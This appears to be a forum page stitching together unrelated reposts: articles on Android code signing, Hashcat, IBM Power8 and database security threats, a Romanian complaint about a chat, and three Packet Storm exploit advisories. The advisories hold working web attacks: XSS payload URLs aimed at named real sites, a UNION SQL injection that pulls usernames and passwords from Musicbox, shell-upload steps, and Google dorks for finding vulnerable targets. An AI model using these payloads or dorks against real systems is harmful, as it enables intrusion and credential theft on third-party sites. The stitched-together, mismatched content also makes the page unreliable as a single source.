seamlessly upgrade applications when new versions are available. At the time this policy was promulgated, I believe the date was 25 years in the future. Google's stated security model for Android is that the code signature is used merely so that the company can tell which apps were written by the same developer. They are not designed to identify the issuer of the code, except to the degree that he is also the issuer of other code signed with the same keys. Google then goes on to add this little bit of disingenuousness: The certificate does not need to be signed by a certificate authority: it is perfectly allowable, and typical, for Android applications to use self-signed certificates. The implication in this statement that you can use a trusted certificate authority, but it's not necessary. Of course, if you get a certificate from a trusted CA, it will have to have a 20+ year term. Who's going to buy that? The really deep-discount CA's (Comodo, for example) have gotten a 5 year certificate down to several hundred dollars, meaning a 20 year cert would have to cost in the thousands. But the very idea of asserting a trust statement for an organization with a 20 year life is somewhat absurd, so no reputable CA would offer it. I would argue that the identity features of code signing are worthwhile, and Google is mistaken, not just to make them optional, but impossible. Remember, that Google's effective insistence on self-signing facilitates impersonation, a potentially useful tool for those trying to induce users to install malicious apps. But even if you accept that identity is overrated, you are still left with the reasons, stated above, for why SSL/TLS certificates with long validity periods are unwise: They lock in security policies which may, over time, become antiquated. Code signing is a high-value attack target to begin with. The origin of this Google policy lies not in security, but in market imperatives. At the time Google created Android and opened it up to the world, the iPhone was firmly established and had major traction with app developers. Google needed to attract those developers and induce them to develop for the then-speculative Android. The number of apps available for the iPhone (then probably just in the tens of thousands) was a key marketing point. So, in order to make it as cheap and easy as possible to code for Android, Google eliminated the whole certificate management part of it. There is still a $25 registration fee for the developer program, so if you blow your reputation with Google you may need to pony up another $25 to start distributing malware again. Google got their wish; developers have flocked to Android, even if many of them are not the right kind of people. And as a result, everyone knows that they only real action in mobile malware is on Android. Apple, Microsoft and BlackBerry all use real code signing for their app stores. Why are up-to-date certificates, issued by trusted authorities which verify the identity of the customer, good enough for them, and for SSL/TLS sites, but not good enough for Android developers? Source ZDnet.Com

Choosing a difficult password might not be enough to protect our accounts in the future. We are admittedly often lax when it comes to choosing difficult-to-guess passwords, and we forget to change them on a regular basis. Rather than trying to remember complex sets of words and numbers, a worryingly high number of us use very simple phrases to protect accounts ranging from email to social media and those used to access corporate systems. In a survey last year, security software developer Splashdata found that the most common passwords used in 2012 included "qwerty," "12345678" and "Password1" -- phrases that wouldn't require a code breaker to guess. However, thanks to the updated password cracker ocl-Hashcat-plus, even more complex combinations are unlikely to protect targeted data. As reported by Ars Technica, the easily available password breaker ocl-Hashcat-plus has received a series of improvements which allow it to accommodate passwords of up to 55 characters. The ocl-Hashcat-plus version of the password cracker has previously been limited to solving sequences of up to 15 characters. This quicker variation of Hashcat and Hashcat-lite, released over the weekend, has the potential to crack passwords of up to 64 characters -- depending on the hash being targeted. In the release notes, lead Hashcat developer Jens Steube said that support for passwords longer than 15 characters was "by far one of the most requested features" in the update. "We resisted adding this "feature," as it would force us to remove several optimizations, resulting in a decrease in performance for the fast hashes," Steube writes. "The actual performance loss depends on several factors (GPU, attack mode, etc), but typically averages around 15 percent." After modifying 618,473 total lines of source code over six months, the new version is able to conduct eight billion guesses per second on a high number of hashes, and attacks can be tailored depending on which firm has been targeted. Named the Password Analysis and Cracking Kit (PACK), this update optimizes the password cracking process, rather than breaks sequences itself. The update also supports a number of new algorithms, including targets TrueCrypt 5.0, 1Password, Lastpass, MacOSX v10.8, Microsoft SQL Server 2012 and Samsung Android Password. Perhaps eventually the only solution to password theft will be to go back to the physical realm for security. Google is one such company looking at new ways to scupper hacker efforts by developing password-replacing jewellery that would open your account through a system of authentication potentially more difficult to breach. Source Zdnet.Com

Big iron sales are still generating $6bn to $7bn a year for IBM - which is enough to justify designing its own Power processors and building its own wafer baker. At the Hot Chips conference at Stanford University on Monday, some of the chief architects behind the Power8 electronics were on hand to show off the feeds and speeds of the next-generation motor for the company's Power Systems lineup. Significantly, the Power8 chip is also the foundation for Big Blue's OpenPower consortium - an effort to make it easier to hook networking, accelerators and other features into Power processors by allowing third parties to license chunks of intellectual property in the style of ARM Holdings and its RISC cores. IBM announced the OpenPower effort earlier this month, with GPU maker Nvidia, network chip maker Mellanox Technologies, motherboard maker Tyan, and advertising moneymaker Google all lending their support to the cause. Whether or not the OpenPower effort gains traction remains to be seen; the Power8 is so clearly engineered for midrange and enterprise systems for running applications on a giant shared memory space, backed by lots of cores and threads. Power8 does not belong in a smartphone unless you want one the size of a shoebox that weighs 20 pounds. But it most certainly does belong in a badass server, and Power8 is by far one of the most elegant chips that Big Blue has ever created, based on the initial specs. Jeff Stuecheli, who has the title of chief nest architect for the Power8 processor, gave the presentation at Hot Chips going over the feeds and speeds. If the cores on a Power chip are the eggs, then the chief nest architect worries about all of the other things that surround the cores - what Intel calls the uncore regions when it talks about chips. The Power8 nest is lined with L3 caches, PCI-Express and DDR memory controllers, various other accelerators to speed up functions that might otherwise run on the cores, and the NUMA interconnects for implementing shared memory across multiple sockets. With the Power8 chip, IBM has a few goals. First, the company is shifting from the 32-nanometer processes used for the relatively recent Power7+ chips to a 22-nanometer process. The shrinking of the transistor gates allows IBM to add more features to a die, cranks the clocks, or do a little of both. Judging from the Power8, it looks like IBM is content to keep in the same clock speed range as the Power7+ chips - around 4GHz, give or take a little. It'll also move PCI-Express 3 controllers into the chip package to keep those hungry little Power8 cores fed; these controllers will offer a coherent memory protocol to external accelerators as well as a new cache hierarchy that goes all the way out to the L4 cache. As expected, IBM is also goosing the number of processor threads per core with Power8, doubling it up to eight per core. IBM has been vague about how many cores it might squeeze onto a die with the 22-nanometer shrink, and it could have probably done as many as sixteen cores if it had not added so much eDRAM L3 cache memory with the Power7+ and then boosted it even further with the Power8. On the workloads that Big Blue is targeting with its Power Systems iron, having more cache and cores running at near peak utilisation is more important than having lots of cores on a die. Just as is the case for mainframes, at the prices that IBM has to charge for Power Systems servers, the chip has to be architected to run at close to full-tilt-boogie in a sustained manner. If IBM can do that, then it can garner the prices it commands and the profits we all presume it gets from Power Systems. The Power8 chip is implemented in IBM's familiar high-k metal gate processes, which include copper and silicon-on-insulator technologies in a 22-nanometer process. The precise transistor count was not given during the presentation, but the Power8 chip weighs in at 650 square millimetres; this is a bit bigger than Power7+, which used a 32-nanometer process, had 2.1 billion transistors, and a surface area of 567 square millimetres. The Power8 core has a total of sixteen execution pipes. These include two load store units (LSUs) and a condition register unit (CRU), a branch register unit (BRU), and two instruction fetch units (IFUs). There are two fixed-point units (FXUs), two vector math units (VMXs), a decimal floating unit (DFU), and one cryptographic unit (not labeled in the core diagram above). Each core now has eight threads implemented using simultaneous multithreading (what IBM calls SMT8), instead of four threads per core with the Power7 and Power7+ chips. And like earlier Power chips, this SMT is dynamically tuneable so a core can have one, two, four, or eight threads fired up. Source TheRegister.co.uk

Dupa cum spune si titlul propun sa se inchida acel chat. Argumente : - Nu se respecta scopul acestui chat.Daca cineva intra si cere ajutor nu primeste. - Acel chat nu este un chat. Chat = Kabron . De dimineata pana seara n-ai loc sa spui un cuvant despre altceva decat muschi. - Nu se discuta chestii legate de informatica. De dimineata pana seara nu sunt decat conversatii ale lui Kabron cu cel mai bun prieten al sau Elchief. - Nu se respecta regulamentul. Daca intri pe chat si nu esti prieten cu Kabron sau ElChief esti amenintat,provocat sa injuri apoi automat primesti un amarat de kick. - Toata ziua sunt discutii despre cu totul altceva decat informatica. - Atrage numai scandaluri si amenintari. - Daca primesti kick pe chat esti amenintat ca primesti ban si pe forum ( uneori chiar primesti ) In concluzie acel chat este inutil.De cand s-a creat chatul nu mai exista Yahoo Messenger pentru anumiti indivizi si s-au mutat acolo de la 6 dimineata precum zice Kabron alias Karton. Astea sunt argumentele.Cine e pro voteaza da , cine e contra voteaza nu. Simplu si la obiect. Nu faceti off-topic, nu incercati sa ma contraziceti, e sugestia mea, mi-am adus argumentele, lasati lumea sa voteze.

Introduction This post introduces principal database vulnerabilities, providing an overview of the possible effects for their exploitation. For each database vulnerability, the principal cyber threats are exposed and a few suggestions are proposed for their mitigation. In the second part of the article interesting statistics related to the incidents/data breaches in private sectors and related costs are explored. Database Vulnerabilities According to the latest security reports released by principal security firms, hackers consider database vulnerabilities as principal flaws to exploit in order to bypass defense of targets. The Imperva security firm recently issued a very interesting report that explains which are the principal database vulnerabilities for enterprises and how hackers exploit them. I strongly suggest reading the report, which provides a detailed description and techniques for its mitigation for each threat. I personally created a list of the “Top Ten Database Security Threats” based on the security threat reports proposed by principal security companies, including Imperva, from 2010 to 2013. 1. Excessive privilege abuse 2. Legitimate privilege abuse 3. Privilege elevation 4. Exploitation of vulnerable, misconfigured databases 5. SQL injection 6. Malware 7. Denial of service 8. Database communication protocol vulnerabilities 9. Unauthorized copies of sensitive data 10. Backup data exposures 11. Probably many IT technicians still ignore many of them and the success of so many attacks against enterprises and organizations is the demonstration that a database flaw doesn’t mean only “SQL Injection”! The adoption of a multi-layered database security defense strategy is strongly suggested; the adoption of best practices and the implementation of internal controls could sensibly reduce the risk for data exposure caused by various attack vectors. The matrix below identifies solutions for each of the top 10 database threats proposed by Imperva in its last study: Figure 1 Matrix Threat – Solution (Imperva) Privilege Abuse The first three points in the above list are related to the abuse of database privilege settings. In both cases, “legitimate privilege” and “excessive privilege,” the principal source of the problem is represented by the grant of unnecessary access privileges to the users or applications with consequent increase of the attack surface. In the third case, the threat is represented by privilege elevation operated by hackers. The mitigation for this category of database vulnerabilities is the elimination of any excessive rights; of course, this requires an additional effort for administrators who have to identify excessive rights analyzing for each user the real business needs. This task could be executed manually, but is considered time-consuming; that’s why large enterprises have deployed specific solutions for analytical process. The access rights could be managed at various levels: Security experts consider an optimal choice is to control query-level access discriminating SQL operations (SELECT, UPDATE, etc.) and data for each entity that access to the system. “Query-level access control is useful not only for detecting excessive privilege abuse by malicious employees, but also for preventing most of the other top ten threats described herein. Most database software implementations integrate some level of query-level access control (triggers, row level security, etc), but the manual nature of these “built-in” features make them impractical for all but the most limited deployments. The process of manually defining a query-level access control policy for all users across database rows, columns and operations is simply too time consuming.” Another element to consider is the exploit of legitimate privileges that could be abused by ill-intentioned users for obtaining access to corporate database: It is possible, for example, that malware on the machine could catch the database credentials to retrieve information stored in the archive. A possible solution to legitimate privilege abuse is the deployment of the context of database access controls enforcing policy for client applications, time of day, and location. In this way, it is possible to discriminate the use for legitimate database access privileges. Hackers typically follow alternative ways trying to exploit target software vulnerabilities to escalate access privileges to those of an administrator. Attackers could exploit vulnerabilities in stored procedures, built-in functions, and even SQL statements to increase their access privileges. To prevent this type of attack, businesses use a combination of intrusion prevention systems (IPS) and query-level access control. Misconfigured Databases and Leak of Input Validation Attackers could benefit from unpatched databases or archives not properly configured that still have default accounts and configuration parameters. The first step for a penetration testing is the analysis of those flaws. An efficient patch management process, especially for large enterprises, could reduce the time of exposure for the release of new database patches; vulnerability assessment activities could also support the mitigation of those cyber threats. The SQL Injection The SQL injection is probably the most popular vector of attack for databases. In a typical attack, the hackers inject unauthorized database statements into a vulnerable SQL data channel, such as stored procedures and web application input parameters. These injected statements are specifically crafted to be executed on the database side for malicious purposes. The successfully execution of a SQL injection attack can give to the attackers unrestricted access to an entire database. If these injected statements are executed by the database, critical data stores can be viewed, copied, and altered. “Preventing SQL Injection—Three techniques can be combined to effectively combat SQL injection: intrusion prevention (IPS), query-level access control (see excessive privilege abuse), and event correlation. IPS can identify vulnerable stored procedures or SQL injection strings. However, IPS alone is not reliable, since SQL injection strings are prone to false positives. Security managers who rely on IPS alone would be bombarded with ‘possible’ SQL injection alerts. However, by correlating a SQL injection signature with another violation, such as a query-level access control violation, a real attack can be identified with extreme accuracy. It’s unlikely that a SQL injection signature and another violation would appear in the same request during normal business operation.” Malicious attackers successfully use SQL injection on legitimate web sites using various techniques: They often adopt a search engine’s index to find vulnerable websites by using one of the numerous DIY SQL injecting tools available on the black market. The availability of the DIY Google Dorks based hacking tool allows ill-intentioned people to acquire precious information on remotely exploitable websites, data that could be collected to compromise them; for example, deploying a malicious exploit kit or exploiting known vulnerabilities. The tool relies on Google Dorks for a target evaluation. In particular, the DIY Google Dorks based hacking tool has built-in features that can be used to evaluate the possibility of performing a SQL injection attack or to discover all the targets that aren’t protected by a CAPTCHA challenge mechanism. Cybercriminals could also rely on botnets actively crawling inside a search engine’s index, looking for websites vulnerable to SQL injection attacks. One of the most popular massive SQL injection attack affected over a million web sites during in October 2011, an offensive directly connected to the Lizamoon mass SQL injection attacks. Example Let’s use a very simple query as example: SELECT fields FROM myTableWHERE field = '$EMAIL'; where $EMAIL' is an email address provided by the user via a web form. If an ill-intentioned user provides the following input: dummy’ OR ‘1’=’1 in the email field, and it is not validated, the resulting SQL will be SELECT fields FROM myTableWHERE field = 'dummy’ OR ‘1’=’1'; Due the presence of the ’1?=’1? condition, which is always TRUE, the query returns every item in the myTable. Denial of Service (DOS) and Database Communications Protocol Vulnerabilities Exactly like any other service, a database can suffer a denial of service attack; there are various ways to flood DBMS with requests that may impede the database from providing data to intended users. DOS may be achieved by exploiting database platform vulnerabilities to crash a server, flooding the system with requests, or using specifically designed malware. Protection from these cyber threats needs a multiple level defense system that has the capability to recognize the sources of attack and apply the needed countermeasures. It’s fundamental to put in place defensive measures at network, application, and database level. Principal classes of DoS attack are: - Abuse of functions - Complex queries - Bugs and defects in the database - Application usage Another critical element for database security is represented by a communications protocol that could be exploited by attackers to obtain unauthorized access to the data. The principal database vendors are aware of cyber threats related to the communication protocols; the majority of recent security fixes released by IBM and Oracle are related to protocol vulnerability. The SQL Slammer2 worm represents a perfect example of malicious code designed to exploit a flaw in Microsoft service. The countermeasure most efficient against database communication protocol attacks is protocol validation designed to parse traffic and block malicious ones in case anomalous patterns are detected. Data Exposure Data exposure could be caused by various factors. For example, it is possible that data backup devices are stolen or unauthorized copies of sensitive data are accessed by unauthorized entities. The principal cause of data exposure is the absence of a secure mechanism for protecting database copies. In many cases, companies that were victims of incidents did not have an inventory of all their databases and related backups. Each database is a mine of information and could contain sensitive data that need the control of accesses. Outdated database instances represent one of the principal weaknesses for organizations; numerous security audits revealed the absence of proper management of media containing old copy of the databases. A company must identify all databases within internal infrastructures and the data contained; for each archive it has to define privileges of access and maintain track of every activity during its lifecycle, from its creation to the dispose of the media support used for the storage. Data classification is a must, identifying the sensitive information within the archives. It is also strongly suggested to discover combinations of data that could expose confidential information, despite the fact that the same data could appear innocuous, if combined they could reveal sensitive data. An accurate inventory of databases including location of sensitive data and access controls should be set in compliance with corporate data access policies. To prevent backup data exposure it is also necessary to encrypt the backup. Malware and Databases Another serious menace for the database is represented by the most classic cyber threat, malware. The malware authors could in fact design malicious code to automate the exploitation of one of the above points; the principal purposes of those malicious agents are information stealing and sabotage. The damage to an enterprise database could have serious repercussion on business for private companies. One of most popular agents that targeted victims’ databases is W32.Disttrack malware, also known as Shamoon, which is able to wipe out data from infected PC hard disks. In November 2012, Symantec published a security alert on a new malware dubbed W32.Narilam that was designed to damage corporate databases. Exactly like Shamoon, this malware hit a specific the geographic area, the Middle East. Figure 2 – Narilam diffusion (Symantec) The W32.Narilam worm attempts to spread by copying itself to all drives and certain shared folders on the victim’s PC. There weren’t instances that included a module to steal information from the victims. The worm was designed to attack SQL archives; it was able to search for database instances having one of the following names: - alim - maliran - shahd Once the database instance was found, the malware was able to access database objects to manipulate them; it was also able to delete the entire archive. The malware was designed to find objects with specific names belonging to the Arabic and Persian languages (e.g., hesabjari than means “current account” in Arabic/Persian). Narilam was written in the Delphi programming language and has a behavior similar to other malicious agents, but what is considered “unusual” by security researchers is its capability to update a Microsoft SQL database if it is accessible by OLEDB. The investigation revealed that the malicious code was designed to target mainly corporations, the percentage of business users hit is of 97.1%, while non-business users are at 2.9%. The Symantec report stated: “Unless appropriate backups are in place, the affected database will be difficult to restore. The affected organization will likely suffer significant disruption and even financial loss while restoring the database. As the malware is aimed at sabotaging the affected database and does not make a copy of the original database first, those affected by this threat will have a long road to recovery ahead of them.” A few days after its discovery, the Iranian national CERT, also known as “Maher,” announced that “Narilam” was an already known malware detected for the first time in 2010 and that it didn’t represent a serious cyber threat like other agents that hit the Iranian region. The simple nature of the malware looks more like an attempt to harm the software company reputation among their customers. The Cost of a Data Breach in Private Sector Now we have listed the principal vulnerabilities related to a database. Unfortunately, the cost related to a data breach is still very high and its analysis it is necessary to highlight the importance of adopting proper countermeasures to mitigate the risk of incidents/cyber attacks. In May 2013, the Ponemon Institute published its annual analysis on the cost related to accidental data exposure. The paper, titled “2013 Cost of Data Breach Study: United Kingdom,” is benchmark research sponsored by Symantec and independently conducted by the institute. The study is focused on the cost of data breach incidents for companies located in the UK. It examines the costs incurred by 38 UK companies in 12 industry sectors after these businesses experienced the loss or theft of protected personal data and then had to notify breach victims and/or regulators as required by law Let’s start with some alarming data: The average per capita cost of an incident increased from £79 to £86 and the cost of data breach continues to rise for the sixth consecutive year Figure 3 – The average per capita cost of data breach over six years (Ponemon Institute) The organizational cost grew from £1.75 million to £2.04 million. Negligence is considered the main cause of data breaches (accounting for 37% of incidents), confirming the need to establish a strong commitment for the diffusion of security culture within corporates. Figure 4- The average total organizational cost of data breach over six years (Ponemon Institute) The study revealed that malicious attacks also increased, from 31% to 34%, and related data breaches are generally considered most costly. The per capita cost of a data breach caused by malicious or criminal attacks was £102.' Figure 5 – Per capita cost for three root causes of data breach (Ponemon Institute) Cost of data breaches due to system or business process failures was £79 and the loss for data breaches caused by the employee or contractor negligence was £76 per compromised record. Lost business costs (including the abnormal turnover of customer, increased customer acquisition activities, reputation losses, and diminished goodwill) rose from £779 thousand in 2011 to £921 thousand in 2012. Lost business cost has nearly doubled over the last six years, also ex-poste response and detection costs (e.g., activities that attempt to address victims’, regulators’, and plaintiff counsels’ concerns about the breach incident, legal and consulting fees that attempt to reduce business risk and liability) increased from approximately £451 thousand in 2011 to £508 thousand in 2012.. Conclusion The data presented by the Ponemon Institute demonstrate how insidious and expensive are cyber threats that target vulnerabilities in databases. Despite the high level of awareness of the principal menaces, the number of incidents has increased in recent years and with the cost suffered by victims of incidents or data breaches has also increased. To reduce the impact of these events, an organization needs to prepare a formal incident response plan, the adoption of proper procedures could, in fact, reduce the total cost of a data breach. Organizations have to define and adopt a strong security policy sustained by a strong commitment of high management and the policy must include corporate database security. The hiring of outside consultants could also contribute to the improving both for processes of security policy definition and for the definition/implementation of data breach response. Security of databases is a critical element for the cyber security policy of any companies, but the data related to the incidents seems to suggest to us that organizations still don’t perceive it! References http://www.imperva.com/docs/WP_TopTen_Database_Threats.pdf http://docs.media.bitpipe.com/io_10x/io_102267/item_692230/2013%20Report%20UK%20CODB%20FINAL%2041.pdf W32.Narilam, the malware that hit databases in Middle East - Security Affairs Shamoon Malware, cyber espionage tool, cyber weapon or ... - Security Affairs Hacking with new DIY Google Dorks based hacking tool! W32.Narilam | Symantec https://www.owasp.org/index.php/SQL_Injection Dancho Danchev's Blog - Mind Streams of Information Security Knowledge: Massive SQL Injection Attacks - the Chinese Way http://docs.media.bitpipe.com/io_10x/io_102267/item_692230/2013%20Report%20UK%20CODB%20FINAL%2041.pdf https://securosis.com/blog/database-denial-of-service-the-attacks Source : Resources.InfoSecInstitute.Com

Iti poti da seama si din titlu.

Description : The WordPress Post-Gallery plugin suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data. Author : IeDb Source : WordPress Post-Gallery Cross Site Scripting ? Packet Storm Code : The Wordpress post-gallery Plugin suffers from a Cross-Site Scripting vulnerability. ################################# # Iranian Exploit DataBase Forum # http://iedb.ir/acc # http://iedb.ir ################################# # Exploit Title : Wordpress post-gallery Plugin Xss vulnerabilities # Author : Iranian Exploit DataBase # Discovered By : IeDb # Email : IeDb.Team@Gmail.com # Home : http://iedb.ir - http://iedb.ir/acc # Software Link : http://wordpress.org/ # Security Risk : High # Tested on : Linux # Dork : inurl:/post-gallery/thirdparty/phpthumb/ ################################# # Exploit : # http://site.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=[Xss] # Dem0 : http://www.knappenforeningen.no/wp/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script> http://monsterbike.eu/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script> http://www.yerevanmagazine.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script> http://www.bambusudsalg.dk/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script> ################################# # Tnx To : TaK.FaNaR - l4tr0d3ctism - r3d_s0urc3 - Bl4ck M4n - F??iD - Medrik - Achraf - Dj.TiniVini # B3hz4d - C0dex - Beni_Vanda & All Member In Iedb.ir/acc & Iranian Hackers ################################# # Exploit Archive = http://www.iedb.ir/exploits-411.html #################################

Description : Musicbox version 2.3.8 suffers from cross site scripting, remote shell upload, and remote SQL injection vulnerabilities. Author : DevilScreaM Source : Musicbox 2.3.8 Cross Site Scripting / Shell Upload / SQL Injection ? Packet Storm Code : #Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities #Author : DevilScreaM #Date : 25/08/2013 #Category : Web Applications #Vendor : http://www.musicboxv2.com/ #Version : 1.0 - 2.3.8 #Dork intext:Musicbox Version intext:Musicbox Version 2.3.8 © 2008 inurl:genre_albums.php?id= #Vulnerability : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability #Tested On : Windows 7 32 Bit (Mozila & Chrome) #Greetz : Newbie-Security.or.id SQL Injection Vulnerability http://site-target/genre_albums.php?id=[SQLI] Example http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users-- ========================================================================================== Cross site scripting / XSS Vulnerability *Search 1. Go To Fiture Search 2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search 3. See Result or See with URL http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0 Example http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0 ======================================================================================== *News Profile 1. Register To Website or go to link http://site-target/register.php 2. Login to Website 3. Go to Menu [ My News ] 4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1> And at Detials input your XSS or Text See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME] Example http://server/musicbox/member.php?uname=devilscream ========================================================================================== Shell Upload Vulnerability *Artist Galery 1. Go to Admin Page, And Login 2. Go to Upload Artist Image or Go to Link http://site-target/admin/adminpanel.php?action=artistgallery 3. Select Your Shell/Backdoor , And Click Submit 4. Result Upload At http://site-target/artist_gallery/Your_Backdoor.php ============================================================================================ *Album Galery 1. Go to Admin Page, And Login 2. Go to Upload Album Image or Go to Link http://site-target/admin/adminpanel.php?action=albumgallery 3. Select Option, Example Option "All Album", And Click Submit 3. Select Your Shell/Backdoor , And Click Submit 4. Result Upload At http://site-target/album_gallery/Your_Backdoor.php ==========================================================================================

Description : WordPress Simple Login Registration version 1.0.1 suffers from a cross site scripting vulnerability. Author : Dylan Irzi Source : WordPress Simple Login Registration 1.0.1 Cross Site Scripting ? Packet Storm Code : ########################################################################################### # Exploit Title: Cross Site Scripting WP Simple Login Registration 1.0.1 - Wordpress # Date: 26 de Agosto del 2013 # Exploit Author: Dylan Irzi # Credit goes for: websecuritydev.com # Vendor Homepage: http://envato.dropntheme.com/wp-simple-login-registration-plugin/ # Tested on: Win8 & Linux Mint # Affected Version : 1.01 y Posteriores. ########################################################################################### Timeline: - 20 De agosto XSS Encontrado y Reportado. - 25 De Agosto Vendedor responde que la vulnerabilidad es por PHP.INI - 26 De Agosto Diclosure!! ------------------------------------------------------------------------------------------ Campos de Login Son Vulnerables a Cross Site Scripting Reflected Via Post. <input id="username" class="text-input" type="text" value="Vector XSS" name="username"> <input type="password" class="text-input" id="password" name="password"> Vector: ""><img src=x onerror=prompt(/XSS/);>> Example: http://envato.dropntheme.com/wp-simple-login-registration-plugin/live-demo/login/ http Live Request. ------------------------------------------------------------------------------------------ Host: envato.dropntheme.com User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 AlexaToolbar/alxf-2.18 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://envato.dropntheme.com/wp-simple-login-registration-plugin/live-demo/login/ Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 252 POST: username=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&password=&remember-me=forever&submit=Log+in&login_nonce_field=a72b0d3cb6&_wp_http_referer=%2Fwp-simple-login-registration-plugin%2Flive-demo%2Flogin%2F&wpslrp_action=ddsfeu_login ------------------------------------------------------------------------------------------ *By Dylan Irzi @Dylan_Irzi11 Pentest de Seguridad.*